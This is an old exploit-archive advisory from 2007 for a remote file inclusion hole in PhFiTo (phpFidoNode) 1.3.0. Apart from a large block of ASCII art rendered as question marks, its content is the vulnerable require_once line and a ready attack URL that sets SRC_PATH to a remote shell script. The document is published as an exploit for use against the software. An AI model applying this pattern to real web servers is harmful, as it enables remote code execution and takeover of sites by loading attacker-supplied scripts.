PhFiTo 1.3.0 (SRC_PATH) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PhFiTo 1.3.0 (SRC_PATH) Remote File Inclusion Vulnerability
# Published : 2007-09-28
# Author : w0cker
# Previous Title : mxBB Module mx_glance 2.3.3 Remote File Include Vulnerability
# Next Title : Public Media Manager <= 1.3 Remote File Inclusion Vulnerability

?????__________________________________________?????
????????_____________________________________???????
???????????_________________________________????????
??????????????_____________________________?????????
????????????????__________________________??????????
???????????????????______________________???????????
?????????????????????___________________????????????
??????????????????????_________________?????????????
????????????????????????_______________?????????????
??????????????????????????_____________?????????????
___?????????????????????????__________??????????????
_____?????????????????????????________??????????????
________???????????????????????_______??????????????
___________??????????????????????_____??????????????
________________???????????????????___??????????????
_____________________???????????????__??????????????
___________________________????????????????????????_
_____________________???????????????????????????____
______________???????????????????????????????_______
___________???????????????????????????????????______
________????????????????????????????????????????____
______????????_____??????????????????????????????___
____?????????_______??????????????????????????????__
__???????????_______???????????????????????????????_
_?????????????_____?????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
????????????????????????????????????????????????????
_??????????????????????????????????????????????????_
__?????????????????????????????????????????????????_
_____?????????????????????????????????????????????__
_________????????????????????????????????????????___
_______________??????????????????????????????????___
_________________???????????????????????????????____
_________________???????????????????????????________
________________??? ???????_____ ??????????___________
_________________?????_________?????_________?????__
__________????_________????____________?????????____
__________?????????????????_____??????????__________
__________?????????????????___?????_________________
__________?????______??????_________________________
# phpFidoNode  <=  Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
##################################################
#ERROR1:phfito-post.php
#require_once $SRC_PATH."P_phfito.php";;<<< rfi coded.
#Other Files:
#/phfito/phfito-post?SRC_PATH=[ShellScript]
##################################################
#Download:http://switch.dl.sourceforge.net/sourceforge/phpfidonode/phfito-1.3.0.tar.gz
#
##################################################
####specialthanx:####Str0ke####Kezzap66345################
##################################################

# www.Syue.com [2007-09-28]